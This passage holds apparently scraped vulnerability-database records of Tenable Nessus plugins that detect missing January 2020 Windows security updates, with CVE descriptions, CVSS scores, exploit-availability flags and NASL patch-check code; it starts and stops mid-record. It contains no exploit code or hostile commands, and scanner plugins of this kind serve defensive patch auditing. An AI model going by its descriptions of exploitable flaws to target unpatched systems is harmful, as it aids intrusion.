(CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534273.NASL", "href": "https://www.tenable.com/plugins/nessus/132859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132859);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0612\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4534273\");\n script_xref(name:\"MSFT\", value:\"MS20-4534273\");\n\n script_name(english:\"KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n 
using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. 
(CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. 
(CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. 
A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\");\n # https://support.microsoft.com/en-us/help/4534273/windows-10-update-kb4534273\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a22c8c16\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534273.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534273');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534273])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T17:26:26", "description": "The remote Windows host is missing security update 4534271.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to 
the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. 
An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 
(CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534271: Windows 10 Version 1607 and Windows Server 2016 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2021-12-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534271.NASL", "href": "https://www.tenable.com/plugins/nessus/132858", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132858);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/13\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0612\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4534271\");\n script_xref(name:\"MSFT\", value:\"MS20-4534271\");\n\n script_name(english:\"KB4534271: Windows 10 Version 1607 and Windows Server 2016 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534271.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. 
This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534271/windows-10-update-kb4534271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e147f537\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534271.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
